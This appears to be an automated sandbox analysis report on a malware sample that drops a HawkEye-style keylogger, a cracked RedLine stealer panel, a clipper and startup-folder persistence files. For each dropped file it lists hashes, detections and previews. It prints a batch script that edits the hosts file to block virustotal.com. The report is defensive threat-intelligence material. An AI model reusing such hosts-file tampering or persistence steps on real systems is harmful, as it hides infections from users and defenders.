                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.1.7.3.2.8.6.0.3.5.7.3.9.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.1.7.3.2.8.6.3.9.0.4.2.6.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.3.5.0.a.d.e.-.b.6.9.5.-.4.d.e.2.-.8.8.7.7.-.7.2.1.1.f.c.e.2.e.5.d.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.f.8.-.0.0.0.1.-.0.0.1.c.-.e.b.e.d.-.1.4.1.1.a.8.d.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.6.e.e.f.0.5.8.8.d.d.0.3.8.f.5.f.f.2.a.7.3.c.7.0.a.d.d.3.6.c.1.6.5.9.4.9.5.3.2.2.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.0././.2.9.:.1.7.:.5.3.:.3.7.!.0.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6493.tmp.WERInternalMetadata.xml
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):5676
                                                                                        Entropy (8bit):3.7219070243581234
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:RtIU6o7r3GLt3iSS63ia6eYZ5BSfgRAgVBCaM18L1fao0m:Rrl7r3GLNiSS63ia6eYZ5BSgCp18L1fZ
                                                                                        MD5:B42975E415A75C4CC8FA14FE1DC97DD1
                                                                                        SHA1:A7584F6F58ECEA3D9F5BA379C927C1C4B8B5FB3F
                                                                                        SHA-256:2F88C278B6B57892FEDEF357323FAD2D980AA128CFEF95A5E43B1386A5E687F0
                                                                                        SHA-512:40216909F03821637F7121DA2199E2353D264E95656E0D4150887F8E6A8FB11886F34EF447008BAEA567D5CA8D9D71CD907A5853D91D9A072C59DDFB4CCC3F37
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.2.4.<./.P.i.d.>.......
                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6688.tmp.xml
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4699
                                                                                        Entropy (8bit):4.455476964891945
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwSD8zsjJgtWI9jzWSC8BN8fm8M4JFKsKWuFdP+q8vRKWqb/uEB+/hKd:uITf9oCSN0JFKXPKAWEk/hKd
                                                                                        MD5:8CA2F90D6BABEB2530A1B91B2B9FF6A6
                                                                                        SHA1:0CD4F5CF2300A9B07862DC4ED5C11E41D5BAF876
                                                                                        SHA-256:7D828E529450D49F9B40BECE93A43007EEC440C228E77366A2CA9EB72FB7B377
                                                                                        SHA-512:E90C156862267DC16351CF113A413C03DFB78CFD17B532C352A5E3A588D1B4CA09D45C5EA364F200D163F00C643D85F332225CAAE418824EF90C12D8169C5855
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1260204" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\RedLine.MainPanel-cracked.exe.log
                                                                                        Process:C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):525
                                                                                        Entropy (8bit):5.278948378331044
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3LaJcP0/9UkB9t0kaHYGLi1B01kKVdisk7v:ML2pBLaYgioQF
                                                                                        MD5:CB9A918AA4F64DF8162B857C63195287
                                                                                        SHA1:70E078D64F44CCB2BD89B106204E14D9E3B58894
                                                                                        SHA-256:104503FEB03BB8F7D338CDB64A0B2E2B608A966BDFE899142C9762B2D21F9260
                                                                                        SHA-512:3C1EB042EA3D9892271ADD759E516FE626209D2F5F5EC25A309380F16935FE8640B4751529CD6B5826D387DED9F7F2069F54095BCA7F3A19AE2116B81C30595B
                                                                                        Malicious:true
                                                                                        Reputation:unknown
                                                                                        Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..
                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Keylogger.exe.log
                                                                                        Process:C:\Users\user\AppData\Local\Temp\Keylogger.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):916
                                                                                        Entropy (8bit):5.282390836641403
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:MLF20NaL3z2p29hJ5g522rW2xAi3AP26K95rKoO2+g2+:MwLLD2Y9h3go2rxxAcAO6ox+g2+
                                                                                        MD5:5AD8E7ABEADADAC4CE06FF693476581A
                                                                                        SHA1:81E42A97BBE3D7DE8B1E8B54C2B03C48594D761E
                                                                                        SHA-256:BAA1A28262BA27D51C3A1FA7FB0811AD1128297ABB2EDCCC785DC52667D2A6FD
                                                                                        SHA-512:7793E78E84AD36CE65B5B1C015364E340FB9110FAF199BC0234108CE9BCB1AEDACBD25C6A012AC99740E08BEA5E5C373A88E553E47016304D8AE6AEEAB58EBFF
                                                                                        Malicious:true
                                                                                        Reputation:unknown
                                                                                        Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..
                                                                                        C:\Users\user\AppData\Local\Temp\HOST.bat
                                                                                        Process:C:\Users\user\Desktop\Hpdyv8oO3j.exe
                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):522
                                                                                        Entropy (8bit):4.602721733839044
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:h4xBuAR04xBuAR04xBuAR04xBuARm8HP04xBuARm8Hrq9i5HP04xBuARm8Hrq9i4:WxBhxBhxBhxBLxBygxBy9
                                                                                        MD5:ACE9684D1899236D68944B8FD65D1FB5
                                                                                        SHA1:558A8B99483E4F0D8D2D0C6A509589901265881B
                                                                                        SHA-256:52DE0F6975F003E8F79F37F30BE69CB38F3679E23DAC8F0446625A76C14A8B19
                                                                                        SHA-512:937F39AD2910D62BDA8FD71D46083517D380D07C610794461FB62D3A9A66C602D36ECE1B5AEE24649EE521AF6768C7C89827E8065692CC6CB0A12FBFCA9127DA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: @echo off..cd %systemroot%\system32\drivers\etc..exit..@echo off..cd %systemroot%\system32\drivers\etc..exit..@echo off..cd %systemroot%\system32\drivers\etc..exit..@echo off..cd %systemroot%\system32\drivers\etc..echo 127.0.0.1 virustotal.com >> hosts..exit..@echo off..cd %systemroot%\system32\drivers\etc..echo 127.0.0.1 virustotal.com >> hosts..echo 127.0.0.1 yandex.com >> hosts..exit..@echo off..cd %systemroot%\system32\drivers\etc..echo 127.0.0.1 virustotal.com >> hosts..echo 127.0.0.1 yandex.com >> hosts..exit..
                                                                                        C:\Users\user\AppData\Local\Temp\Keylogger.exe
                                                                                        Process:C:\Users\user\Desktop\Hpdyv8oO3j.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):533504
                                                                                        Entropy (8bit):6.503682543410338
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:huxqV1dNbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9Y:RdNQtqB5urTIoYWBQk1E+VF9mOx9oiL
                                                                                        MD5:C4E4A84909D8FF8DD222B8252365985D
                                                                                        SHA1:6EEF0588DD038F5FF2A73C70ADD36C1659495322
                                                                                        SHA-256:14ADE1921A7BFE68DBFD21BFEB14BBEF6B89ED0DD15E9FBFA79A985EB42959F2
                                                                                        SHA-512:24CB338CAE623B7532AC04EE25CC41A8B319D6F80324F3A411796633969604925A857353655BE39D7E2254465F6830E4D6F0A04265C34AB042939EB6AD5D3672
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Arnim Rupp
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Reputation:unknown
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!5|a.....................4........... ........@.. ....................................@.....................................K.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`......."..............@..B........................H.......0}.................X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                        C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe
                                                                                        Process:C:\Users\user\Desktop\Hpdyv8oO3j.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):77824
                                                                                        Entropy (8bit):4.7460869785957795
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:la5jbMQXU4hH8yvmYRVFykX84Jw08W6ArYVTsr7KRbLfC:o5jJXUQCk/raXbO
                                                                                        MD5:098F7F40BACA320377ECA83FBF87F534
                                                                                        SHA1:1C14C269465D850550EB7DC955E5CA5A0FA2CEC2
                                                                                        SHA-256:42B18977DAC9E72BBC4B9FA1A61085CD8A96CD99E59421196AA8AA0D8D4CF225
                                                                                        SHA-512:B6270744603D1D842E42827E561C85A130DAB6859FEFAC2F255B8911175D2394E0D8A48B5F676EC7C4CF4342CD088CB3A99C7379F17171CF5944A07E11D5D577
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 89%
                                                                                        Reputation:unknown
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Kxa............................~.... ........@.. ....................................@.................................,...O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`.......H........6..0.......L....5..p...........................................&.(......*..*..(......*..s.........s.........s.........s.........s..........*....0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0............{....(...+}.....{.....+..*.0..7.........{........,..+%..........,.r...ps....z...|....o...+..*..0.................,.........o....-..+......9....~..............,3~.........(...
                                                                                        C:\Users\user\AppData\Local\Temp\SysInfo.txt
                                                                                        Process:C:\Users\user\AppData\Local\Temp\Keylogger.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):48
                                                                                        Entropy (8bit):4.387380345401073
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:oNWXp5cViEaKC59KuCa:oNWXp+NaZ5v
                                                                                        MD5:95FC50C7E40BB0D5EBD49FCBEE4E890D
                                                                                        SHA1:E5086A9390CC8D6F512A206AB1AC4309A4CC4326
                                                                                        SHA-256:DC88107DF527833D0D8B7AC45D31AF0E5343AE36AB9725016B046CDD77E46EC7
                                                                                        SHA-512:4AC9E01163C00CC874BDBE1E4B5BF2463F8B53B9102705C774C790D8DFD8AEAD662DEDA812CF457022820FFD8174A1CD0275601C4BC6E4CCDB7E5A80CD52F799
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                        C:\Users\user\AppData\Local\Temp\ViRuS.exe
                                                                                        Process:C:\Users\user\Desktop\Hpdyv8oO3j.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):46132
                                                                                        Entropy (8bit):5.26909765114528
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:dmiiqTfk2AMRGwlFgOrjsI5Z52ulLGM88VI02foeZSgTi10U:dpTfDbGwlF9nsI5Z52ulLGM88VI02foT
                                                                                        MD5:D0F09063EA6922ACBFC734145FA48203
                                                                                        SHA1:48253D06D8D053A4433B679E56270553D4F7FD66
                                                                                        SHA-256:71B96AF827245221A3D2AA884636F20BF41627DFC079A02D5DE58CD58C9A0111
                                                                                        SHA-512:E1DAC2DD5A8F05ED26C817CADEDD3A8B0124A15D257BDAB434E88BE2300E64BA8270A0DCFA5990CA8A81D36E274CC77BE843A31E6CC10A074B7DFE4B24C71A3F
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                        • Antivirus: ReversingLabs, Detection: 93%
                                                                                        Reputation:unknown
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............si..si..si..ld..si.Rich.si.........................PE..L...j..G.................`... ......<........p....@..................................~.......................................l..(...........................................................................(... ....................................text....].......`.................. ..`.data........p......................@....rsrc................p..............@..@..:@............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        C:\Users\user\AppData\Local\Temp\bhvB786.tmp
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x91cb4e71, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):0
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:C28A2Ta0xucRfDw/9iD0Xko5QqbMgSFDb7uBis:cRfDc/y
                                                                                        MD5:228AC2AB635442EBC4A1C3F2C2ACBB8C
                                                                                        SHA1:75651BEDDE6473D1F40F4F287EB13A858862AF2C
                                                                                        SHA-256:9E3D696D433E10116BD7BC81039C13A4A496F5D38429745A5891EF46BDCFDC4F
                                                                                        SHA-512:0A75529DEEF98D48415699EEE1FD76BDE00879AF99E13D78F6EB62F4EAE62B63D0FC54A48E1D98EA3CB567FB461BEF601AC3AF86263FABB0487181F40FB8B15A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: ..Nq... .......F1.......te3....wg.......................o.....6....y.......y..h.q.........................6..43....wI.............................................................................................Z............B.................................................................................................................. ............y......................................................................................................................................................................................................................................{!]r.....y.s.................3G?.....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        C:\Users\user\AppData\Local\Temp\hhzclipper.exe
                                                                                        Process:C:\Users\user\Desktop\Hpdyv8oO3j.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):6144
                                                                                        Entropy (8bit):4.0620477915188244
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:efGLLgKK3A/A/Aa5X5X5YggFjju++7J0sLQP6/4RCBvPgKrzwWCLxQ:GGLLgKK3eeB5X5X5YggFjju++JQP6/4Q
                                                                                        MD5:FC07BE5E90A1FFA22B22D3BC58A43E58
                                                                                        SHA1:07BCA65E7754F4EA6093036D83549734AAB53758
                                                                                        SHA-256:7DE848E40DA073492C4F20587C4F53EC43CDFB3C199C6B76F58218D1E696DB1C
                                                                                        SHA-512:6E8C6A203A943D39DFE506F177AD9282C6645EB61306AC345A4AC21899F9833B22792DC23B8C24F439198C99DCC5D5F6301FBA1D8BB65EA32C812DD159F8927F
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Reputation:unknown
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{a............................./... ...@....@.. ....................................@.................................\/..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H........(..p............................................................0..........r...p.r...p.r...p.r...p.r...p..r...p..r...p..r...p..r...p..r...p..r...p..r)..p..r...p..r...p..r...p..r...p..r...p..(........rq..po....,...o......3...(......rw..po....,.r...p(....+ ..rq..po....,...o......3...(......rw..po....,.r...p(....+ ..rq..po....,...o......3...(.... ....(......r{..po....,...o......3..(......rw..po....,.r...p(....+...r{..po....,...o......3..(......rw..po....,.r...p(....+...
                                                                                        C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                        File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):0
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Qn:Qn
                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: ..
                                                                                        C:\Users\user\AppData\Local\Temp\~DF48A538CB1AE66BD4.TMP
                                                                                        Process:C:\Windows\SysWOW64\user32dll.exe
                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.6492304433670057
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:rl3lKFQCb77LLG4ip/CccpgG4ipnaaaaaaturt:reL5i/ce5iG
                                                                                        MD5:2C887583160B6B5FA4FA0C954A41E559
                                                                                        SHA1:F947C07A74F208F6A18F187BE6ECF4F5666971CB
                                                                                        SHA-256:4BEB5B2C63DC903C9ADBE828F09E6D360B03B68A9622170B059068A769C74F8B
                                                                                        SHA-512:33DC7E826B905BD09780D61E7597A17C7E9473CB22B8C6F990A6237274555A0C0BE283C671E9EDDC8897B9ED118AB63200EE20DEE91FE489F5CA339546B79DA6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        C:\Users\user\AppData\Local\Temp\~DFCABBFD68A244241F.TMP
                                                                                        Process:C:\Users\user\AppData\Local\Temp\ViRuS.exe
                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.6492304433670057
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:rl3lKFQCb77LLG4ip/CccpgG4ipnaaaaaaturt:reL5i/ce5iG
                                                                                        MD5:2C887583160B6B5FA4FA0C954A41E559
                                                                                        SHA1:F947C07A74F208F6A18F187BE6ECF4F5666971CB
                                                                                        SHA-256:4BEB5B2C63DC903C9ADBE828F09E6D360B03B68A9622170B059068A769C74F8B
                                                                                        SHA-512:33DC7E826B905BD09780D61E7597A17C7E9473CB22B8C6F990A6237274555A0C0BE283C671E9EDDC8897B9ED118AB63200EE20DEE91FE489F5CA339546B79DA6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exe
                                                                                        Process:C:\Users\user\AppData\Roaming\RedLine.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):77824
                                                                                        Entropy (8bit):4.7460869785957795
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:la5jbMQXU4hH8yvmYRVFykX84Jw08W6ArYVTsr7KRbLfC:o5jJXUQCk/raXbO
                                                                                        MD5:098F7F40BACA320377ECA83FBF87F534
                                                                                        SHA1:1C14C269465D850550EB7DC955E5CA5A0FA2CEC2
                                                                                        SHA-256:42B18977DAC9E72BBC4B9FA1A61085CD8A96CD99E59421196AA8AA0D8D4CF225
                                                                                        SHA-512:B6270744603D1D842E42827E561C85A130DAB6859FEFAC2F255B8911175D2394E0D8A48B5F676EC7C4CF4342CD088CB3A99C7379F17171CF5944A07E11D5D577
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 89%
                                                                                        Reputation:unknown
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Kxa............................~.... ........@.. ....................................@.................................,...O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`.......H........6..0.......L....5..p...........................................&.(......*..*..(......*..s.........s.........s.........s.........s..........*....0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0............{....(...+}.....{.....+..*.0..7.........{........,..+%..........,.r...ps....z...|....o...+..*..0.................,.........o....-..+......9....~..............,3~.........(...
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
                                                                                        Process:C:\Users\user\AppData\Local\Temp\ViRuS.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=0, Archive, ctime=Thu Nov 18 17:13:53 2021, mtime=Thu Nov 18 17:13:53 2021, atime=Thu Nov 18 17:13:52 2021, length=46132, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):1791
                                                                                        Entropy (8bit):3.125340834929565
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:8dlQxhubkkiAKmG+/7X+IMs416EbmX7aB6m:8nZJBDdXfMT1XbmmB6
                                                                                        MD5:F50DBACEDA242CDA5A8F9AA8FE302153
                                                                                        SHA1:D3301CC2B8BBEC48B549220214B557160C5953EA
                                                                                        SHA-256:E5CC4DA8E6EFAAC1CD3EF645A05FCF844D007CCDB14CF514AD8A1978BE16BDC1
                                                                                        SHA-512:7966356678C722451ED823C576E789AD061390161EA3DCC180A16262BC620E0C1A10B2937844C1FF34E7B4CDF66F82251945C099201EBDA21DAFB525A6A3CC78
                                                                                        Malicious:false
                                                                                        Reputation:unknown
